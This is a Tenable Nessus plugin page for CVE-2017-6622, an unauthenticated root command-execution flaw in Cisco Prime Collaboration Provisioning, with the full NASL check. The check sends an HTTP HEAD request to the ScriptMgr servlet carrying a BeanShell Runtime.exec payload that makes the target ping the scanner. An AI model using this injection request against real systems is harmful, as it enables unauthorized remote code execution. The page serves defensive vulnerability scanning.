Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE

2017-07-13T00:00:00
ID CISCO_PRIME_CP_CVE-2017-6622.NASL
Type nessus
Reporter Tenable
Modified 2018-11-15T00:00:00

Description

The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.

Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.

                                        
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration pass: when Nessus loads the plugin with `description` set,
# only the metadata below is recorded and the script exits at the end of
# this block, so the active check further down never runs in this pass.
if (description)
{
  script_id(101531);
  script_version("1.5");
  script_cvs_date("Date: 2018/11/15 20:50:21");

  # Cross-references for the ScriptMgr servlet issue this plugin tests.
  script_cve_id("CVE-2017-6622");
  script_bugtraq_id(98520);
  script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724");
  script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1");
  script_xref(name:"ZDI", value:"ZDI-17-445");

  script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE");
  script_summary(english:"Attempts to perform a remote command injection.");

  script_set_attribute(attribute:"synopsis", value:
"The remote network management server is affected by a remote command
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Cisco Prime Collaboration Provisioning server is affected
by a remote command execution vulnerability in the ScriptMgr servlet
due to a failure to restrict the HTTP HEAD method. An unauthenticated,
remote attacker can exploit this to bypass authentication and execute
arbitrary commands with root privileges.

Note that the remote Cisco Prime Collaboration Provisioning server is
reportedly affected by additional vulnerabilities; however, Nessus has
not tested for these.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/");
  # Mitigation: the vendor fix is a version upgrade; no workaround is
  # recorded here.
  script_set_attribute(attribute:"solution", value:
"Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or
later.");
  # Unauthenticated, network-reachable, full C/I/A impact on both CVSS scales.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration");
  # The check confirms the flaw by making the target execute a command,
  # hence it is flagged as exploited by Nessus rather than version-inferred.
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # ACT_ATTACK: the check body sends a request that causes code execution
  # on a vulnerable host, so it is categorised as an attack, not a probe.
  script_category(ACT_ATTACK);
  script_family(english:"CISCO");

  script_copyright(english:"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.");

  # Runs only where the PCP detection plugin has already stored a version
  # key for the host; other hosts are never sent the test request.
  script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin");
  script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

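# Make sure pcp is detected; hosts without the detection key are skipped.
get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version");

port = get_http_port(default:443);

# Vulnerable ScriptMgr servlet is reached through mod_jk. Any other front
# end is audited as not vulnerable before a single test request is sent.
banner = get_http_banner(port:port);
if (banner !~ "Server:.*Apache.*mod_jk")
{
  audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}

# Marker the target is asked to echo back to the scanner. It is capped at
# 16 bytes because it is passed as the ping -p pad pattern (ping accepts
# at most 16 pad bytes), and it is what the sniffer below looks for in
# the returned ICMP echo request.
pat = SCRIPT_NAME;
if (strlen(pat) > 16)
  pat = substr(pat, 0, 15);

# Initialise explicitly: the verdict below must not depend on an unset
# variable reading as NULL. Only an out-of-band ICMP echo carrying the
# marker proves execution; an HTTP 200 alone is never treated as evidence.
vuln = FALSE;

cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + this_host();
qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");';
uri = "/cupm/ScriptMgr?" + qs;
# HEAD is the method the servlet fails to restrict (CVE-2017-6622).
method = "HEAD";
res = http_send_recv3(
  method        : method,
  item          : uri,
  port          : port,
  exit_on_fail  : TRUE
);

if (res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
{
  # Sniff for echo requests from the target to this scanner. If the target
  # cannot reach the scanner over ICMP (egress filtering, NAT), no frame is
  # seen within the timeout and the host is reported as not vulnerable --
  # a possible false negative, never a false positive.
  filter = "icmp and src " + get_host_ip() + " and dst " + this_host() +
    " and icmp[icmptype] = icmp-echo";
  bpf = bpf_open(filter);
  if (isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open");

  timeout = 5;
  t = unixtime();
  repeat
  {
    frame = bpf_next(bpf:bpf);
    # ping back seen: cmd injection succeeded !
    if (frame && pat >< frame)
    {
      vuln = TRUE;
      break;
    }
  } until (unixtime() - t > timeout);

  bpf_close(bpf);
}

if (vuln)
{
  # Attach the exact request that triggered the callback so the finding
  # can be correlated with web server and mod_jk logs on the target.
  req = http_last_sent_request();
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    generic     : TRUE,
    request     : make_list(req)
  );
}
else
{
  audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}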